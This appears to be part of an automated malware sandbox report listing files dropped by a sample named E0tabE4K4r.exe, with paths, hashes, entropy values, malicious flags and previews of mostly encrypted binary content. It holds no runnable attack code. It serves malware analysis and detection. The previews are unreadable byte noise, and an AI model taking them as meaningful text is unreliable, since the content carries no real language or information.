                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1654
                                                                                                                                                  Entropy (8bit):7.889191396009289
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:9Y6Hk/tUPqca4PgANf4K1osfNFzqS4QitLQKUiwIDXdTO2ZECU2bD:K6E/uFaCgIdosbqSstU+wqXs2pD
                                                                                                                                                  MD5:A22D6666D67F6A06491D837391DBF184
                                                                                                                                                  SHA1:225342FC4B7A425CD7FA357766AFDAE35BC3C52D
                                                                                                                                                  SHA-256:E12F2EF696DB66D4A6427555A9079D7DC191A3332880CF5BB2C81097622D764E
                                                                                                                                                  SHA-512:40ED77AE809544C7FDE47D0F289B0315BC8FAA2A01756E90BCAFB07CDABA73FB081093FBE74F393ACCC49299A8CE9C87DCCD688E7398543FDCC907DB4D74AED0
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:h.t.tG.%.....9.h..B.7.p./3I..5...4....bq.a..U...6..I../.8......[.k.G..P.Fh97...L...o.oGXI./...W..&...}..j.....S.C..1.9.K/.x@.[c....4......j.hKV...-.*+.<.`..$...mP.u..`..u.9...'}O2e..?.k..H....D..c.w.r....W......:...[/O._K.g...;.*.r2...N.lq.!....P....9.L:..I3%-...........#..{^.5.Y..}.F.....,.......*..,1..c.."Oh..I.0....6.#..q....d.I...c..Y=....yQX...S.A.!......9b..........^E.Z..OO..=)..........=NX.....8.\.?-8..k...-..c.j.B..bS.D7..*=!.wA. ......m.S...S....<.b..YZ....#...Il..7`L...*.i...].@...j....E...8.....T.....}......T..H..S..C...}..4S?~..x.2k..G..z......q~Y9.......C.9v.z...em.....N...a....~..f.0..!.b}..S.x.]..;m...im.z.;........T.._..d.....v...^..Rr...@.]..T...e.tAM..qnTw8.z.8...:/..`u..X...!..'.....[TY4O....f..............-.*(.5..]..x..1.3.K.0v.5..&Ri`.....(.1.c|.....L..u..QLo...9..$..oHf{..2...1j-B..@...Ex..~UkZ&.....Jp.-...#.n.$..l..]).P.e|...v........z..}...:.d.K.L.o".....o...`Wd.C.U.e....yo.....YQ. ...O..X..|ybs......^:DvS..

                                                                                                                                                  C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\AC\BackgroundTransferApi\82e31516-2550-42c1-a4b9-d4fb0eaaef96.up_meta_secure

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):836
                                                                                                                                                  Entropy (8bit):7.704893757450202
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:JzxtVzSupDXqIS7kIObGhhVGWp51fep/O2bD:J/VSUWkIQGfV3p5dsD
                                                                                                                                                  MD5:8A7B4436A3FD11336BA2DD483637B987
                                                                                                                                                  SHA1:5B814B029DCEDA1C8D44F42F6750B55EF3409111
                                                                                                                                                  SHA-256:3A411A9C235D5E78E1E07CDF7F4A6632A6C10F43468DD04F6BC2DD389890F636
                                                                                                                                                  SHA-512:5B53D82E5F579BA56DD4395B261B65DAC1F04ED8CAD0834CC3AE72B0ABDC1CACBFC1C95435E09D804836B56F4FF52834F5B80B5F6E71DE1718164BB312F11088
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:.....B...3. ...r|V1.....U..23...N....2.+H....^LD.Pa....+.A....c..6........[..}.j.. M6./.../1.UnP...-.....B.-|..u....\.&..>....<.G.a.E....9$h0.5...e>q.).M.qgA.5.1.cv./2..it7Zm...oyH...q2.|.>.O3...9=...ub...(.f..*=.s.<.Tb..C......4"..b.a.R.x...b'..cvjJ...w...<...z..TS!..!.....m..&A..1.C....2(....6.CzO..i.......2t.i.049mz...l.f:...3.H<;am&.t......Y.c...}M......M..d.#.wb..P..5.P...Z.F.n...i.BI.=.V...#.<9vf$+.5/.......t....E.e...*X.Um.p>..9.f....+Kt..!*.J.t.0ZB1..,..h~J/%K......P6....&...iM..A.i........+.=.H.2..qUN.2q.w.`....Q.k.0..b...?.Q.8.<..@.@xr*<.f.!#..O.Z.pY.H....).m!.x.z.'s......il.M.4..4...I.O..".I.R8.P?'-.......S..U...a..H.....cD.,.1oi...e.P....R.p....~L.:..3n.H.j...8"...M%.....w....C.eD..$u.y=..Wg%mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                  C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\AC\BackgroundTransferApi\88c7cd14-2023-4317-8d74-4ef4db5cc58a.c595abe5-6299-47ce-a968-8a56c22ef048.down_meta

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1428
                                                                                                                                                  Entropy (8bit):7.866336170085309
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:rM56QnJcG+3tiqmtPdSxPzhCd2sOIlAMJyGasUCOz12bD:gYaZ+9inOSOIWMJyGasUCOzOD
                                                                                                                                                  MD5:35025CC53CA2B8B6346FFDB02F978AF4
                                                                                                                                                  SHA1:94605FE038C90B7E916E0AC67CCFEEE38BA64BF7
                                                                                                                                                  SHA-256:3259F68B7E9F3EC3EF27021DC9AA408AA64634BD08E23E006DAE1CB5C6BF230F
                                                                                                                                                  SHA-512:CBDCD1833A014179B47D7A64EE69AE280C55A7B7E1486488018477FB290E36BC9D08D464D8070A0B52ACB349D4B5DBA1C97293C3296C8389B8D97889446625EF
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:h.t.t{1sF.....|...6..9.....G.6..UL.9^......e5..T...a.Q3.i\...E.F.2.R..c.Q..Cy.v.E.."Z..=......3.*....y...Q.........%.z.y.H.I7..$..0...P@$0......".l.U.iX_..$..iv2d$.X#5L ,.1.}.?Q".:...3..m.........1t.(.k.h....c..G.@...T^...0..-^sk.l.^=..qU..e.t.Tr.&.O..*..M}5.w=GW.Ed....Q...y...&.N..v.yw$d..O...J..m;....,......-....Y|.NO.....N.;[O.]..<.G.{...]..y....5.5...z.6..e..._)0..E_...1......teu.k..q'.Q.xgo..?KP_......".;..FG.M.+..e6..W:.V.P...n$u...c..Pu..!...s....~\......,...|.`.[..7.........[....I........N*...q...SF..d..yEM..kI......(..U.9,.../.....^L.{..e.....<...z.U.a;..M.x..v{]..gB.......xw.!..7.l.....`....<...Y./J.J2&^K..J&...~.).......q..<!..>...,.Ph.$?....x.5_..I.....(....+{...w...v(.M...gk..x.}....C.o i6*..J...UfT..\0..d.......%.]>+..^o..@...l-W....\'..R ..Id...z............:.+...[.F*....W>....G.v...g......c!..0*.d........i'u..c...KV6.;.'k...\...~6..........4..i........u.0p....D[..z.8...wn#........4...;F!......?..1.0..mn.!.d....MG..

                                                                                                                                                  C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\AC\BackgroundTransferApi\88c7cd14-2023-4317-8d74-4ef4db5cc58a.up_meta_secure

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):964
                                                                                                                                                  Entropy (8bit):7.812402350196378
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:ge4zE9KNiCSPaZl6y5Rbkrkhfqq0E/gVP827Hr/4+2bD:ge4w9KNi3aZPRbjEPTV97HrwD
                                                                                                                                                  MD5:24B257A44B2343BC907F0BC7CB95CA86
                                                                                                                                                  SHA1:436CB7E5B5539BCBC5B81E1BF906891633F3CF7E
                                                                                                                                                  SHA-256:92ACF03AD32F72EA33E976E731B4290356DC457F6844558D129F0B0EF9808B16
                                                                                                                                                  SHA-512:7906A1D54825C5904388D50F196F44AD781411CE722F5EC7A91390A5FFD1964C648ECDEBBE87BBB8F358A2C34237B7B2017FE038F8218A2C4864E78BB7B2E78D
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:.....|....yM.<x.~+a...t.2...l..]..2.)#F.....'......7X8.....s.D.j1....1Mm..}W}.RR'.......21.Z....)..O.$.i$1..*M...[...v..^...;.y.c..=...)*..\...Ci.Z..cKa....(...*.*..9..P./..........h..r.)l W^c..~.......V).8....e>..hs,..y:.......t...c...s..N.....j...,._..Ia...x.<..@.=L(=....(.........2.KPK.d....k...)$..o(g....e..+U..^.4....mb.....:N.q.a.k.......T.>..C....t#.Z.R{W..a.W1...... .<.z6Bj........Z..I4.......{aU-...h...l..[.".f.x.S.......:....u..b..b1..%...P"V...H|..w.....G....A>y.p..Q..4W$fg.....[.-u.lL>qnU..3...>)Q....!MV[..E.+9L.r-...5u........ki....^....Z9D....X.~r..:+f.h..^..}?..&.%.%;k.8.;..Y..3RPKB...U;..Z.J..@.7..K..I....._...n.7..!.Y.>:......l`QK..Y.gk .z.2.^i....(..x.D.0^.%)-*.....|..$..`...g.;....N......z.../....'.z.g_?s.=.._"sB...|..O...<<7r8HMAp~V].Ct.;}p[.{`...rj.X.K..."X.qV$B..]S;>.xwY...../............9.m...@d02=.....tT7.mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                  C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\AC\BackgroundTransferApi\aa716736-f9c8-47e2-8db0-68f1198516ba.4777863d-33d1-41d6-a255-91d12f23d452.down_meta

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1426
                                                                                                                                                  Entropy (8bit):7.855720335544017
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:Pj4Y1VM4P3qcSAXH+Yzx35dGUKOC+PzOuNfJbjT3Hm2koyFKNky8GOg1mxjq06Vw:Pj4su4P3H/l3qJWPKuNfJm21y+151mV/
                                                                                                                                                  MD5:A5B92672497341E3395EC45C759F754C
                                                                                                                                                  SHA1:9537A9CAC747EAC6F20760136F5477FA58AB7FC2
                                                                                                                                                  SHA-256:F719C5B25DF219A6BF29490F02E6F3AA109C6968C14A3C8273287D0739D18643
                                                                                                                                                  SHA-512:A52A33798E1DA6CF014D610D3EDF9C892FD5635D7493D4CC5A373C173D46AD25E71708C962385002049E301ADB9EEF533E6A8256F4C71B098C0B5309F101ECD3
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:h.t.t....Lz...5I..'..}q.T..U..d.R.f!.j\.5.................p...,...]..j....//.v..v. T.U.......s....%9....t...B;..!-D..p.u.V8....P..O........!.F.L..0h.....}..2XR8.V.agw.)+..=......J2O......._..xc.p_....|u.v...G..8..6..{..B....-.1.)..|..R.~.+.Hn...3.j...N......n...N....ZY.9.U..]yP.ht..|p.5.9S.^..(./.B..h9....a.~0>..<.M.Sg.......E.6 .. G..Z.*..n[b....}....|.>jEj........:7bw.N2......A...R.Ld..d.h.<f.i.....k~..Lx."..w...'vR..y...g.Q...a.....9...U.94&>...x......N.=...wL...u1hw.}..ty.Q.."...:.2.W.W`zy..D...H.n.f_..Te.. ...... ..!.~B........B...........^.`...z..r.......%.....M_.z&N...+..4.jv@`..4@n..`.,.`.>..........*h?~...j..-O._."-.pC.....|[..\...q.Z~...Lv'...7...F}.-.F....gH.>wFP.......<#.*.v3........V._......a...M~4....f.6a.[......[u#.l.Y.A...N.e|....[.M.k.Ft...y|.....m......8......l..\U.m(.C..D...^....G.gL3.Tl%.\..;[..V.A.4..g..m}T&.h...u.oW<U.J..Je.=.1.....&v...M...=@...i.u.\9.?GO..5N.{..e.%DLX!..]/....08..9...|y........y...r5." gL=.c.$o.V...F.

                                                                                                                                                  C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\AC\BackgroundTransferApi\aa716736-f9c8-47e2-8db0-68f1198516ba.up_meta_secure

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):964
                                                                                                                                                  Entropy (8bit):7.75699229844547
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:SLIp/kqN+chgxsQl8iz5vag+oNsmuJxStBCs+2bD:SC/eQgxNl8izcg9NWbStdlD
                                                                                                                                                  MD5:2B399F74FB72DCFD283019F274A34BE0
                                                                                                                                                  SHA1:EC54D5653732AE4679CB8C2FB67D4488ACDF2733
                                                                                                                                                  SHA-256:2D9A6B2710C4631B5155515BFC953B6D30D80A6F451D04B3BBF373BCDCB1B975
                                                                                                                                                  SHA-512:DC30DA41EA5C068ED9DE578F37B6A5DFE463C00B2213C462FEE8A1A0D1D5123993589D971303FC608305053B69BEF02278247976966881274CC706EE96797ADE
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:.....>z..m?.......?..(......W.a...6-... %TC..C.}.V.N"..B\.5L<.7.0.pj....uQnf.x.9..W{W...K..}.w..|.7C...(.X.?(8Sw...I[.e...,..5.........;......<...Q|=...j:..f=...^..\(.#...-XXj[Q.........2.2...,....h............<.v.R|i..#!..|[..hh...I...,Y.j...).*.k.m...)....Ge..`.jE......l;.^3,...gp.g..*.=.{.R.?u..GAr-.$MW.........6....c....+.]L9...@...G......Y..I...I.._N.!`...C....R}..!G..h.6...7.x..eDBK.....lC.K.]......u...Y0.7.....X..7.\o...'.Y......?..qd.\.....d...&R...........C......p.a. .=.YO.h....$u.W.mP.H6j.|...L.pb.I8.\....dV.....o.#..UP.:...K......0.b.<....k......b..(..R.[,vpmQ..}..FFH.n...ZYQ.......]-.B.n....3...D....8B. ..W.4k..-.....Y...52...7N...&85..N..yX..wn`b{rg.!..b.N.&.V....Eik%D.o...>.x0..Q.....l..}..w-..oc.O...e....\.Qc..\....Y..;>m...^.[H.^.X..YR.....i.g[Do..O.el.....Z.<...,c..!.m...v.u3/;.....s..D..-........Ges$...9h.X(.mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                  C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\AC\BackgroundTransferApi\baa697d2-dbd5-4f7b-b9b9-282dbdc8cfdb.67bde2ca-f9ae-41d2-84da-71ab7b41c7d0.down_meta

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1654
                                                                                                                                                  Entropy (8bit):7.899525426682552
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:48:8nA9IOcd35AK/fHpUruTUWRRkg8Uza+X31iQD:8/35AeJUrriRkg8UzT1t
                                                                                                                                                  MD5:A9098F038875BA439CE135EA99188D18
                                                                                                                                                  SHA1:7ACF73D1145493B787983AA96DDE61E5FF3ADD42
                                                                                                                                                  SHA-256:34FC2D3D46966C4B83ED69269FC06C9C8EDBE7C79A6FEE489B04A53CE2589872
                                                                                                                                                  SHA-512:71DA2471FE097F0667860BD041F6545E79C1F50940C8F705E510EF075D6B0EBA5FEC30E87D5150E75F9430488DD4D87E7FCD9F144C94F1769274EE674C9EF684
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:h.t.t@.P.......B'T6............. >>q..\.....*....x.#ep........#..T.."i...|J......%..s.,.,r..5.....-..Cd...f}p.u..8....rk".vW...jr.qZ..np...x.=.b.4-WO..._..^.PG5d.....C.{8.e...P...s.X.....Z...2f?O..R.&-......^.....?.....b..X..D.p.r....O...C..6.aN..n.a.Y..q^<Z../.Y.....v.4..+.W.'.<.l..Ij...M...|n..=.t?@.^..=....=..T5~(....X.}.....,BU.P..e...f>..A9.x.jG.....8A..v8g3.......l.A.u.....U`34S..J.D*r.9.ffN....t.....5.;...E.9.....Dk.'....:(..........=z..$..B$.....x.5......!..3.b.. n6.........X.X...2...."QP3.P.+.v.cV...:.{..\...........C.D.....I..f..z...1..uh..3J#mn(..c.....v.^.]...3o...........$i.zE.V.Vf.....<._.1j..9.vS.....~<G.. .qME..IN.$..f...p..I(...U....._.../....\...D...].q..~x..\+.:m.x8/0.2.%M+(.....3.:+P...@....!JKm.q*...o`.*.M\[..^-[.........\&B.I.7.r....U.4.:....8.2.p..O...%.Pk...........i,y..5.(oq...=.(2I.b. ..{.G..eH.....iF..}CL.B.i.R...5.......R.[B.e..\..'o.L:{W39fv..(!..V>.r+k...=b0~.C.......,U.....V9...s.2..m..y4P.`..|..$Z..;...Y...:6Q..

                                                                                                                                                  C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\AC\BackgroundTransferApi\baa697d2-dbd5-4f7b-b9b9-282dbdc8cfdb.up_meta_secure

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):836
                                                                                                                                                  Entropy (8bit):7.732308080538781
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:SOKxzE5F2BEMG88MpKAU+O1pDqTZI42bD:Sna5TMwdpmkD
                                                                                                                                                  MD5:9C44C403AEF54890F82D7F1C0280108D
                                                                                                                                                  SHA1:C26B63475E3D5254FF30EFF8874F7A4232F80CB5
                                                                                                                                                  SHA-256:2A6907722410ADE8C9EBD426E2AFD4D8FA3CAA7B090A0910905BF41DC2C0EAC7
                                                                                                                                                  SHA-512:A273E097C41F95D528D4924DB13768E875B61D4B1DCFDE969DA60FB40B8311E875F82E9A424036FA792834C98BE20A40C2E60B32AB76DFAB3F1D27EA35B0E3C4
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:.....C......<.@h4.Y..&:..3.d.O.....W-X..4.,.s.5...v.|....^$kz...\..c...;b.f#....X.....R)B~.qx:..w.>....+...aK.).>..1m..".^m..iZf..6.. 0..d.R-#P....._Q.1..{V............W..Z*.................{...q...:.fUJ^.Vc.g..a.4LU..xx.FL.t.M<LR.2.PQ4M..:..cj..h.!...rH.)..u..S..I....`.,....!.".....@R....x:...}...X ..3..A..'..D0....i*g.n..H...9....|.8{Y_*:r..v#......../C..d....K.^.}4w..?t:..Z.sX;...aO..k...>.G..::......V....g...J.#~...6Pe;T..Q..r....zR..J.#.J..@..e/..zw...6.3.R!..Y%.L..^.....c........M..p..rl......[a.(...F>5...y.*FP..nO.1.(..-F)o?r......Xh...x..#.j.....~...6.<.{`.@..d...u3.W.....;.*.9.....c.4..>.'%9........0.%U..`+....K#.B....[U.C.;m.t6N..7=..j....94..VL+....v,...C#s.t....!.CJKhS.b...>O.?.p....g.....E.,mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                  C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\AC\BackgroundTransferApi\c88ec0c0-7aa4-4680-988f-ac847e080aa0.aab6e8b0-14f1-4a25-9d55-c1b4649813d5.down_meta

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1426
                                                                                                                                                  Entropy (8bit):7.868539199151988
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:QZnGBy4gc4+3sdhUB4K1OLsCyvq6Mh7S7GyUolU2aVVsUbpSQ+2bD:+GB36dhUBnO6p47ScPTsipplD
                                                                                                                                                  MD5:D7F9171BD586A25B6679104AC31C45DB
                                                                                                                                                  SHA1:BB6BCDD95CD76BBD9C187A615409909BCC964DE7
                                                                                                                                                  SHA-256:F4FC1DEC9BE385068932273FC4C1AA88317807BCF484F4F2B29F357476DD6B9F
                                                                                                                                                  SHA-512:16434455ED6F4571AB363ACC4321B028ED97AF455CCA5F889B349431A73B8FF905729EE01D5E3C3F230C08DD8064DDF144990738566FA06FECAB66C2AC1E9F7D
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:h.t.t.M..Dp...Uv...AC....(+5..[..^\}......V...LS...=&WA|....c6wU.?nU.qJ.Q..2 ...p...zh..!b..'B+.\.".n..=.,.yC(......!4[.$.l.5.4...L........B..;....N?b.....}...(./.J4...2A.}...^..6V/..t.4.vd..[..+..- .Q.FXJ.....;...!..T.y..urG.B9...dAiJ...9..m..~..........f.c..%^..."......x...Y.M.F...8<....(..s.........A.J..8..0.........?.HZ..UB....8.B..-3.......e..U...F4..g.q.t9H..Ru.a...A.LQ...&\..{R.N..F...A..S...................7.=D...lpv......(.....y...a..e-.n.......NAi......W...C.t_...W...!.k...._h>...M.."g.<...G.%.oPS...ke...o^..8.......E.......XH9.c..0....X...:~:..V`...$*k.|....K.....i.hR.T...<....A......=d.......'..#'..`t.)..(..;.::M y..[*y....q.e..+.../o............SP..f.vz....{...B..CQq..........?.lS].......0N".q*.Sf..{7f"A.Zy]....:W....EL....L?.S...N..f.?._m..;A.}?>....3n3qy|3.........m|..ea^....^w.....3..3..H~..hy...(`&.-...Q0.E..[.:....y....t..M..2..C....\.t.[..T.<...........8.%.....M.]..1.WX#D.k.........Zi..j...RZ.f.b.,.z..{+.....

                                                                                                                                                  C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\AC\BackgroundTransferApi\c88ec0c0-7aa4-4680-988f-ac847e080aa0.up_meta_secure

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):964
                                                                                                                                                  Entropy (8bit):7.778868444562631
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:mg4RvGTxRvQrfFc6AcxOZrHzmaogXAcU+OdV2bD:G6xRWdc6pxORxXAuOduD
                                                                                                                                                  MD5:1DF4EBBDEFA901BB891C4CAE15166460
                                                                                                                                                  SHA1:23F696F73D335FA4425038A6B33E42409CAD32E7
                                                                                                                                                  SHA-256:87A72467617A03BA8D7A5F18547CAEADB57F1FE7609B95D2CE48175FD7C72E3B
                                                                                                                                                  SHA-512:D69F405D4436796527A554B227254C4B7D162C1534F22E423E178F09E5EF44D8E76E3BA273E6461A42777A4B89BAF67AAD55B6AD669601E0C3F8DE7C1972DEB3
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:........e<....~.o.j.v.............L........C).?}.i....|....w@..ff.....Q8..Dsy[.......(.3....J.4..%S.yl.;.Xb3DP."fj.k6..m8{^.5...HQ..1P0. 3....uh.V..|.7..r..={w....fL..w.#Ie.....sH.....zz.]F./../....W.j7C/.5...r.+.....d.T#.6K.P.....m.V-X..S..+.{U.....]...s...XI*^...m )....4...T...7..E...,.$m1*...^.|..T'..yl.A..9d...u...m...............R.5V..C..0P..P#..S$........C.......}.smzoH.[.6Q.....C......0l.Y-a..z...8.....N....w.^...36[.s^...U....&...<.&.......Y.+U...2T.."..........a?.=2k...e..yjI.iG5..pWV.6.,.....Tfk.P8.E..l.o...C.%..wV...S..N.S....3.&.1..`...\eo...d:...m.X.....{2...24...~.]eg@s......$.|............H.......,Z..fD.=....\.}......B.G.9.hzX.v..-P.3Sz.[.Cau.......0.q..SQ.-B..GA.oZ..{Ih..q..B.4....C..!.%~...G.b.^.G...s.H..Z..U.!...u.....{..K..5.z+..a...k.[...G..C'.(.4..a.;.-..;.R..z.......JC.4..3m..s.Y?....i......O....T..mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                  C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\ZEGESUAP\7\-U2ww19iycr3M_DiD25JdVUDdqk.br[1].js

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):91794
                                                                                                                                                  Entropy (8bit):7.997914093423153
                                                                                                                                                  Encrypted:true
                                                                                                                                                  SSDEEP:1536:pfdt/1NuQOTzVf9ANzrBt5+3tgAQcbVXBhTJQzkXvRshXGfqYsOQ1hHzGWk:p31Y9m5+plRhFQYXZWXGjsvHzGR
                                                                                                                                                  MD5:092F463EE1BA3AB3C6CABFEACEB50C43
                                                                                                                                                  SHA1:7D1B9562296F3CD8165D054E43B0A46AEAA792AB
                                                                                                                                                  SHA-256:B051863C5209FE3F69C089D6CDD6BA0A779EE0DED7B931DBE9855483D45E3B66
                                                                                                                                                  SHA-512:6BEAFDB1D269A98D64242820673B0749B1906582EDE8BCC62D2A8C69DE33D50D0F0EF79478EB776F3763A2AD1D23BD5ECB449F5B7EE312EE519AB84EA68D94FA
                                                                                                                                                  Malicious:true
                                                                                                                                                  Preview:var Wv.....F..:~.v#...._.....4c....2.......Edg......6y..).k...../x>...=s'.....(.R.$..}M.>RTl....z.2..,.=eU.S]....%...]..X..6..XJ.'..&.~.Z......U.........316..g.Q..n.1.[Bm.......z.r.%...D.M6...d....F@.Q.dd......&c.Y^@H.......GO5.H)^.dQA......?..[}.g...@.5S.x.../...T.J..#..>`....... 5..!. ....~.L...yV!.0tG._.b..../u.i....-.G1 FO.......v*Is..$M..1......}..-....$2$...pvtA`,.^.=?.@.B..=....(....!.#.6....:%..U:.K..U.t.(i....!~..q..k....c....H.._.....Gq.5.w...%..!.3"...o#.....X.xbBT.^q.'.k..~..U.01j.q..\.&;.z9...d.%.j.p..M!R.f....8._.0.fV.%..,..%....8....N..a..R.]..Ma....1&........]..i.U....~-.. <....I..&..<..D0Gj....ft..t...C>....h...2zS.;M.....X...)....K!.O=.9.C7.TPyM...M2..3..|..`..c...e.o...b#.D......J..`.Y9.\........=?....n.ps+O..7.Et...".P..G.....LY.ook T,......K.....[`" ..|..D.....g...K...Hz1.Q[...M....B...3.i].EK}O=.n.^.....-....\..I.T...9>..d...Ou.........M...HR.c...z.&...lu.o.6...\.J1v....g.o5.B..W......V...E.).$E....

                                                                                                                                                  C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\ZEGESUAP\7\1dU-gngnSbFHyDXzxcnjLbIIJkA.br[1].js

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):15202
                                                                                                                                                  Entropy (8bit):7.988218559059384
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:384:9wDls/cTEtRcQPlY6kNXfNY2sx/QeBPowun+hJfuIgWViX:9qlsEKjlYXfe/QeB8myL
                                                                                                                                                  MD5:AD46615F375E3C13F9CE63A93FC4EE48
                                                                                                                                                  SHA1:30BD06B3469EAAB2B384CFD580DDCF9C7FAF2D10
                                                                                                                                                  SHA-256:728EF7D6024FEEA00DC0309FC83843A41D78E149A065B14226C8878034C514EA
                                                                                                                                                  SHA-512:45E016182D7090D70CCF9C9D43610748AB065A3D4F8B99E250DCA736E61D15F79D2F9FAE4704593B1089D7D61AC0742554BC1F1BD4676D5082AF921A0386768D
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:var W6=.......]..8.[.)..._k..0.....!.T]..9.g..j.F.w.Q...h..v5...grj......,.v..A.&vY$.O...<VQ.,.C_.L...5).=\..@......o.#...7.{....1.......0.....F5d^....}ts......R^...J...O...n..\.d%..d......A.%..A.:..V...ga..E.-.S..K..fY%...y8...o...1.+.J.*.8...<.....S...M.,*5...g.4.j2..Y"...<]....B..uu.ci.e.2.s.E...V..7......Xa..8B@N!..#d?.o6..e..t..W.B...@..R..V.....%.X...K..7L.F.A.*...K.s.7.n...g./...a....u.Q..7OUZ...)=.D.....^..L...%.......D.)1>....q...U(.../.......g...L..lB.'.Z .fj...$....!i..J...`..4O...r.z....%.q..yz.+1.u.$1.u.H:~n.<.+..`_.=I....`S.....g.;T.>R..;...rR.....;Q...jk.~!/X^.:.W......J.bM..t....xB..GKmf.............1.?..Q...w.W........ ..CB.Pa....&w..I.S.6&.[U;.....G...5Dl......*.n....D.o.$...h...l..C.B.L!.X....T.Qj..B........}=.3.......r........>.P.R...y..k.3....$...|y....._;v..m.._..?&X....|...h.J..'.. .~.........".F.Q....'.g.....$:..g.t....%...>D!w..........#pAfc......(E..M.._..ff.W.......*.F......1..a.".w.i.xX.....Tq.hK.L.....N...L.M

                                                                                                                                                  C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\ZEGESUAP\7\4BpQ1bD8vX1mXuJObN-gg9RqkyQ.br[1].js

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1284
                                                                                                                                                  Entropy (8bit):7.835601036165864
